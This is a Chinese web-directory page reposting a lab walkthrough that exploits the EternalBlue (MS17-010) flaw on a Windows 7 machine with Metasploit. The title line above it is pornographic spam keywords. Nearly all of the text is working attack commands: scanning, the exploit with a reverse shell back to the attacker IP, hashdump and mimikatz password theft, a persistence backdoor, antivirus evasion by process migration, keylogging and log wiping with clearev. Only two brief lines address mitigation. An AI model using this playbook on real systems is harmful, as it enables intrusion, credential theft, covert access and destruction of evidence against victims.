日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

實驗環(huán)境

客戶機(win7 ip:192.168.0.105)

攻擊機(kali ip:192.168.0.101)

具體步驟

查看局域網(wǎng)設(shè)備

使用netdiscover 查看局域網(wǎng)的設(shè)備

永恒之藍漏洞利用

 

如上圖所示,搜索到了一臺IP為192.168.0.103的設(shè)備

使用 nmap 掃描

root@WHOAMI:~# nmap -sS -A -p- -v -O 192.168.0.103

-sS 半開掃描

-A 全面系統(tǒng)檢測、啟用腳本檢測、掃描等

-p- 掃描全部開放的端口

-v 顯示掃描過程,

-O 啟用遠程操作系統(tǒng)檢測,存在誤報

掃描結(jié)果如下圖

永恒之藍漏洞利用

 


永恒之藍漏洞利用

 

發(fā)現(xiàn)目標(biāo)機器開放的端口還有windows 7操作系統(tǒng)

對主機進行掃描確認(rèn)是否存在漏洞

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.0.103

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

永恒之藍漏洞利用

 

上圖中出現(xiàn)- Host is likely VULNERABLE to MS17-010!說明客戶機存在MS17-010漏洞下面開始漏洞利用

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.103

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.101

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

永恒之藍漏洞利用

 

連接成功

永恒之藍漏洞利用

 

查看權(quán)限

meterpreter > getuid

永恒之藍漏洞利用

 

查看登錄的用戶的明文密碼

使用命令 run hashdump 加載 hashdump 模塊

永恒之藍漏洞利用

 

使用命令 load mimikatz 加載 mimikatz 模塊,再使用 help mimikatz

永恒之藍漏洞利用

 

使用 wdigest 命令獲取登錄過的用戶儲存在內(nèi)存里的明文密碼

永恒之藍漏洞利用

 

查看分區(qū)

run post/windows/gather/forensics/enum_drives

永恒之藍漏洞利用

 

查看補丁信息

永恒之藍漏洞利用

 

給 win7 留后門

使用命令 run persistence -X -i 10 -r 192.168.0.101 -p 444

永恒之藍漏洞利用

 

再開啟一個 msf

加載 handler 模塊

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.0.101

msf5 exploit(multi/handler) > set LPORT 444

msf5 exploit(multi/handler) > run

如下圖成功在444端口監(jiān)聽到一個會話

永恒之藍漏洞利用

 

Metasploit 鍵盤記錄

ps查看進程

永恒之藍漏洞利用

 

將meterpreter當(dāng)前的進程移動到其他指定的進程中,這樣做的好處是可以給meterpreter一個相對穩(wěn)定的運行環(huán)境,同時可以很好的躲避殺毒軟件

永恒之藍漏洞利用

 

最后,我們啟動鍵盤記錄器,等待一段時間并轉(zhuǎn)儲輸出。

永恒之藍漏洞利用

 

清除痕跡

在滲透入侵的過程中難免會留下一下日志信息痕跡,我們可以使用此命令來擦除留下的痕跡

使用clearev

永恒之藍漏洞利用

 

解決措施

·及時打補丁

·安裝殺毒軟件自動更新補丁

分享到:
標(biāo)簽:漏洞
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定